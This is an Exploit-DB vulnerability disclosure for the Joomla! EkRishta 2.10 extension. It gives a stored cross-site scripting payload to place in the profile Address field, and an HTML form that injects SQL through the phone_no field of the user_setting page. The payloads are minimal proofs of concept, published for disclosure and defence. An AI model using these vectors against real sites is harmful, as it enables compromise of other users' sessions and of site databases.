Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection

2018-05-20T00:00:00
ID EDB-ID:44660
Type exploitdb
Reporter Exploit-DB
Modified 2018-05-20T00:00:00

Description

Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection. Webapps exploit for PHP platform

                                        
                                            # Exploit Title: Joomla! extension EkRishta 2.10 - Persistent Cross-Site Scripting  / SQL Injection
# Dork: N/A
# Date: 2018-05-18
# Exploit Author: Sina Kheirkhah || (Sina.For.Sec@gmail.com)
# Software Link: https://extensions.joomla.org/extensions/extension/living/dating-a-relationships/ek-rishta/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.10
# Category: Webapps
# CVE: N/A
#
#
#
#POC-1) Cross site scripting (XSS) :
#
#
# Description:
#
# 1)create a profile
# 2)you can use your payload in profile info page
# 3)for example in Address field you can use
"></textarea><script>prompt('address')</script>
# 4)now the Payload will be executed whenever someone visits your profile
#
#
# POC-2) SQL Injection:
#
# Description:
# 1)the website has filtered all the inputs for sql injection BUT
# you can use the user_setting page in order to Inject SQL code
# by using POST method
# http://localhost/ekrishta/index.php/profile/user_setting
#
# <form method="POST" action="http://localhost/ekrishta/index.php/profile/user_setting">
# <input type="text" name="phone_no" value="SQL injection">
# <input type="hidden" name="task" value="save">
# <input type="submit" name="save" value="Save"/>
# </form>